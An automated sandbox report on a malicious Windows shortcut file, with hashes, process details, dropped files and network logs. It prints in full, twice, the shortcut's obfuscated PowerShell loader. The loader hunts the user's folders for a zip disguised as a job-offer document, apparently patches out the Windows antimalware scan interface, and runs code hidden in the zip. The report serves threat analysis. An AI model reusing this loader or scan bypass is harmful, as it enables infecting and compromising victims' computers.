File name: lnk

Full analysis: https://app.any.run/tasks/a6df00af-8893-4b6f-856f-a2f825b4b5f8
Verdict: Malicious activity
Analysis date: April 17, 2026, 14:57:19
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags: susp-lnk
MIME: application/x-ms-shortcut
File info: MS Windows shortcut, Item id list present, Points to a file or directory, Has command line arguments, Icon number=45, Unicoded, Archive, length=431104, window=showminnoactive, IDListSize 0x018d, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\", LocalBasePath "C:\windows\system32\WindowsPowerShell\v1.0\Powershell.exe"
MD5: 15B14B9829F34521450E4E7D8D212052
SHA1: F52840234797DFAEFD29E8C42CB3868CCC81EC96
SHA256: BA929388AE8B854A9C98B37C4DAE2BDA4F15DD1CAD97388224C4F636D7D26C6C
SSDEEP: 96:8s0FL5rrSKC9CnAOcO7+1RNY5Evp/MCc8KtwxFssAwFlsaAyZAHcGgli:8s0FjC9CAOcO7wRNaEvp/MC/KtwzsTwi

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • References archive utilities (LNK)

      • powershell.exe (PID: 2576)
  • SUSPICIOUS

    • Obfuscation pattern (POWERSHELL)

      • powershell.exe (PID: 2576)
    • Escape characters obfuscation (POWERSHELL)

      • powershell.exe (PID: 2576)
  • INFO

    No info indicators.
No Malware configuration.

TRiD: .lnk | Windows Shortcut (100)

EXIF

LNK

Flags: IDList, LinkInfo, CommandArgs, IconFile, Unicode
FileAttributes: Archive
TargetFileSize: 431104
IconIndex: 45
RunWindow: Show Minimized No Activate
HotKey: (none)
TargetFileDOSName: Powershell.exe
DriveType: Fixed Disk
DriveSerialNumber: 0000-0000
VolumeLabel: -
LocalBasePath: C:\windows\system32\WindowsPowerShell\v1.0\Powershell.exe
CommandLineArguments: $ci=2;$TFhR='HkfDqfm';$znwZu='Dienstangebot_Hinterberger_J_07-04-26';$uTgUz='AllDirectories';$iL='\';$uEblg=(.('gci') env:LOCALAPPDATA).('Value')+$iL+$znwZu+'.zip'+$iL+$znwZu+'.zip';$zRv=.('test-path') $uEblg;if(!$zRv){$uEblg='.','Downloads','Documents','Desktop'|.('foreach-object'){(.('gci') env:USERPROFILE).('Value')+$iL+$_ }|.('foreach-object'){try{[IO.Directory]::('getfiles')($_,$znwZu+'.zip',$uTgUz)}catch{}}|.('select-object') -f ($ci-1);};if(!$uEblg){return};$sARqq='join';$ZbZSa=[type]('string');$TWJT=$ZbZSa::$sARqq('','Nam','e');$HsxN=$ZbZSa::$sARqq('','canC','ontent');$UKL=$ZbZSa::$sARqq('','iUt','ils');$G=$ZbZSa::$sARqq('','NonPu','blic,Static');$U=[type]('ref');$NKE=$U.('Assembly').('GetTypes')();foreach($fdqwn in $NKE) {if($fdqwn.$TWJT -match $UKL){$ZOXE=$fdqwn}};$rO=$ZOXE.('GetMethods')($G);foreach($AQ in $rO) {if($AQ.$TWJT -match $HsxN){$HjGz=$AQ}};class B { static [int] A([string]$SA){return $SA[0]}};$O=([type]('B')).('GetMethod')('A');$ndcz=$ZbZSa::$sARqq('','Runtime.Intero','pServices.Marshal');$q=[type]($ndcz);$Hs=$q::('ReadIntPtr')([long]$O.('MethodHandle').('Value')+(10-$ci));$q::('Copy')(@($Hs),(2-$ci),[long]$HjGz.('MethodHandle').('Value')+(10-$ci),1);$f=[IO.File]::('ReadLines')($uEblg)|.('where-object'){$_ -match $TFhR}|.('select-object') -f ($ci-1);if(!$f){return};$sARqq='join';$ZbZSa=[type]'string';$hrYI='split';$clyd=$TFhR.('length');$EvYn=$f.('substring')($clyd);$C=$EvYn.$hrYI('`');$UyKmX=$ZbZSa::$sARqq('',$C);$znwZu=(41-$ci);$znwZu=[char]($znwZu);$QbMKJ='$l='+$znwZu+$uEblg+$znwZu+';'+$UyKmX;$UGHR=[type]'scriptblock';$JjPVA=$UGHR::create($QbMKJ);& $JjPVA;Write-Host '.';
IconFileName: %SystemRoot%\system32\SHELL32.dll
Total processes: 135
Monitored processes: 2
Malicious processes: 1
Suspicious processes: 0

Behavior graph: start > powershell.exe (no specs) > conhost.exe (no specs)

Process information

PID: 2576
CMD: "C:\windows\system32\WindowsPowerShell\v1.0\Powershell.exe" $ci=2;$TFhR='HkfDqfm';$znwZu='Dienstangebot_Hinterberger_J_07-04-26';$uTgUz='AllDirectories';$iL='\';$uEblg=(.('gci') env:LOCALAPPDATA).('Value')+$iL+$znwZu+'.zip'+$iL+$znwZu+'.zip';$zRv=.('test-path') $uEblg;if(!$zRv){$uEblg='.','Downloads','Documents','Desktop'|.('foreach-object'){(.('gci') env:USERPROFILE).('Value')+$iL+$_ }|.('foreach-object'){try{[IO.Directory]::('getfiles')($_,$znwZu+'.zip',$uTgUz)}catch{}}|.('select-object') -f ($ci-1);};if(!$uEblg){return};$sARqq='join';$ZbZSa=[type]('string');$TWJT=$ZbZSa::$sARqq('','Nam','e');$HsxN=$ZbZSa::$sARqq('','canC','ontent');$UKL=$ZbZSa::$sARqq('','iUt','ils');$G=$ZbZSa::$sARqq('','NonPu','blic,Static');$U=[type]('ref');$NKE=$U.('Assembly').('GetTypes')();foreach($fdqwn in $NKE) {if($fdqwn.$TWJT -match $UKL){$ZOXE=$fdqwn}};$rO=$ZOXE.('GetMethods')($G);foreach($AQ in $rO) {if($AQ.$TWJT -match $HsxN){$HjGz=$AQ}};class B { static [int] A([string]$SA){return $SA[0]}};$O=([type]('B')).('GetMethod')('A');$ndcz=$ZbZSa::$sARqq('','Runtime.Intero','pServices.Marshal');$q=[type]($ndcz);$Hs=$q::('ReadIntPtr')([long]$O.('MethodHandle').('Value')+(10-$ci));$q::('Copy')(@($Hs),(2-$ci),[long]$HjGz.('MethodHandle').('Value')+(10-$ci),1);$f=[IO.File]::('ReadLines')($uEblg)|.('where-object'){$_ -match $TFhR}|.('select-object') -f ($ci-1);if(!$f){return};$sARqq='join';$ZbZSa=[type]'string';$hrYI='split';$clyd=$TFhR.('length');$EvYn=$f.('substring')($clyd);$C=$EvYn.$hrYI('`');$UyKmX=$ZbZSa::$sARqq('',$C);$znwZu=(41-$ci);$znwZu=[char]($znwZu);$QbMKJ='$l='+$znwZu+$uEblg+$znwZu+';'+$UyKmX;$UGHR=[type]'scriptblock';$JjPVA=$UGHR::create($QbMKJ);& $JjPVA;Write-Host '.';
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll

PID: 7780
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events: 7 649
Read events: 7 649
Write events: 0
Delete events: 0

Modification events: No data

Executable files: 0
Suspicious files: 3
Text files: 2
Unknown types: 0

Dropped files

PID | Process | Filename | Type
2576 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\abb0679f9841ca75.customDestinations-ms | binary
    MD5: EF8B26C424975BB9BCF8452DF7554E94
    SHA256: 7FC130139FCA7525E2F2837456133D79FB014F630848350FFBB67D03D8C2E981
2576 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\P9CPAL3U9CEJLBW6EALN.temp | binary
    MD5: EF8B26C424975BB9BCF8452DF7554E94
    SHA256: 7FC130139FCA7525E2F2837456133D79FB014F630848350FFBB67D03D8C2E981
2576 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_gre1emab.4fh.ps1 | text
    MD5: D17FE0A3F47BE24A6453E9EF58C94641
    SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2576 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_yy1hym05.5yd.psm1 | text
    MD5: D17FE0A3F47BE24A6453E9EF58C94641
    SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2576 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary
    MD5: 289DD891AC4D3F77CB48D9EF885F8477
    SHA256: A78E49CC151BA5549FE3D15D39C863E9D00BAA4599037C5563CFDC2B87964197
HTTP(S) requests: 35
TCP/UDP connections: 24
DNS requests: 19
Threats: 1

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
5276 | MoUsoCoreWorker.exe | GET | 304 | 40.127.240.158:443 | https://settings-win.data.microsoft.com/settings/v3.0/wsd/muse?ProcessorClockSpeed=3094&FlightIds=&UpdateOfferedDays=4294967295&BranchReadinessLevel=CB&OEMManufacturerName=DELL&IsCloudDomainJoined=0&ProcessorIdentifier=AMD64%20Family%2023%20Model%201%20Stepping%202&sku=48&ActivationChannel=Retail&AttrDataVer=186&IsMDMEnrolled=0&ProcessorCores=6&ProcessorModel=AMD%20Ryzen%205%203500%206-Core%20Processor&TotalPhysicalRAM=6144&PrimaryDiskType=4294967295&FlightingBranchName=&ChassisTypeId=1&OEMModelNumber=DELL&SystemVolumeTotalCapacity=260281&sampleId=95271487&deviceClass=Windows.Desktop&App=muse&DisableDualScan=0&AppVer=10.0&OEMSubModel=J5CR&locale=en-US&IsAlwaysOnAlwaysConnectedCapable=0&ms=0&DefaultUserRegion=244&UpdateServiceUrl=http%3A%2F%2Fneverupdatewindows10.com&osVer=10.0.19045.4046.amd64fre.vb_release.191206-1406&os=windows&deviceId=s%3ABAD99146-31D3-4EC6-A1A4-BE76F32BA5D4&DeferQualityUpdatePeriodInDays=0&ring=Retail&DeferFeatureUpdatePeriodInDays=30 | US | - | - | whitelisted
2156 | SIHClient.exe | GET | 304 | 74.179.77.204:443 | https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL | US | - | - | whitelisted
2156 | SIHClient.exe | GET | 200 | 135.233.95.135:443 | https://fe3cr.delivery.mp.microsoft.com/clientwebservice/ping | US | - | - | whitelisted
2156 | SIHClient.exe | GET | 200 | 74.179.77.204:443 | https://slscr.update.microsoft.com/sls/ping | US | - | - | whitelisted
2156 | SIHClient.exe | GET | 304 | 74.179.77.204:443 | https://slscr.update.microsoft.com/SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL | US | - | - | whitelisted
8044 | svchost.exe | GET | 200 | 23.216.77.22:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | NL | binary | 825 b | whitelisted
5316 | svchost.exe | POST | 400 | 40.126.31.2:443 | https://login.live.com/ppsecure/deviceaddcredential.srf | US | text | 203 b | whitelisted
8044 | svchost.exe | GET | 304 | 40.127.240.158:443 | https://settings-win.data.microsoft.com/settings/v3.0/WSD/UpdateHealthTools?os=Windows&osVer=10.0.19041.1.amd64fre.vb_release.191206-&sku=48&deviceClass=Windows.Desktop&locale=en-US&deviceId=s:BAD99146-31D3-4EC6-A1A4-BE76F32BA5D4&sampleId=s:95271487&appVer=10.0.19041.3626&FlightRing=Retail&TelemetryLevel=1&HidOverGattReg=C%3A%5CWINDOWS%5CSystem32%5CDriverStore%5CFileRepository%5Chidbthle.inf_amd64_9610b4821fdf82a5%5CMicrosoft.Bluetooth.Profiles.HidOverGatt.dll&AppVer=&ProcessorIdentifier=AMD64%20Family%2023%20Model%201%20Stepping%202&OEMModel=DELL&UpdateOfferedDays=4294967295&ProcessorManufacturer=AuthenticAMD&InstallDate=1661339444&OEMModelBaseBoard=&BranchReadinessLevel=CB&OEMSubModel=J5CR&IsCloudDomainJoined=0&DeferFeatureUpdatePeriodInDays=30&IsDeviceRetailDemo=0&FlightingBranchName=&OSUILocale=en-US&DeviceFamily=Windows.Desktop&WuClientVer=10.0.19041.3996&UninstallActive=1&IsFlightingEnabled=0&OSSkuId=48&ProcessorClockSpeed=3094&TotalPhysicalRAM=6144&SecureBootCapable=0&App=SedimentPack&ProcessorCores=6&CurrentBranch=vb_release&InstallLanguage=en-US&DeferQualityUpdatePeriodInDays=0&OEMName_Uncleaned=DELL&TPMVersion=0&PrimaryDiskTotalCapacity=262144&InstallationType=Client&AttrDataVer=186&ProcessorModel=AMD%20Ryzen%205%203500%206-Core%20Processor&IsEdgeWithChromiumInstalled=1&OSVersion=10.0.19045.4046&IsMDMEnrolled=0&ActivationChannel=Retail&FirmwareVersion=A.40&TrendInstalledKey=1&OSArchitecture=AMD64&DefaultUserRegion=244&UpdateManagementGroup=2 | US | - | - | whitelisted
5316 | svchost.exe | POST | 400 | 40.126.31.2:443 | https://login.live.com/ppsecure/deviceaddcredential.srf | US | text | 203 b | whitelisted
5316 | svchost.exe | GET | 200 | 23.11.40.157:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAz1vQYrVgL0erhQLCPM8GY%3D | NL | binary | 471 b | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:137 | - | - | Not routed | whitelisted
8044 | svchost.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
5276 | MoUsoCoreWorker.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
 | | 48.192.1.65:443 | activation-v2.sls.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
4 | System | 192.168.100.255:138 | - | - | Not routed | whitelisted
5316 | svchost.exe | 40.126.31.2:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
5316 | svchost.exe | 23.11.40.157:80 | ocsp.digicert.com | AKAMAI-AMS | NL | whitelisted
3428 | svchost.exe | 172.211.123.248:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
8044 | svchost.exe | 23.216.77.22:80 | crl.microsoft.com | AKAMAI-ASN1 | NL | whitelisted
8044 | svchost.exe | 88.221.169.152:80 | www.microsoft.com | AKAMAI-AS | US | whitelisted

Threats

PID | Process | Class | Message
8044 | svchost.exe | Unknown Traffic | ET USER_AGENTS Microsoft Dr Watson User-Agent (MSDW)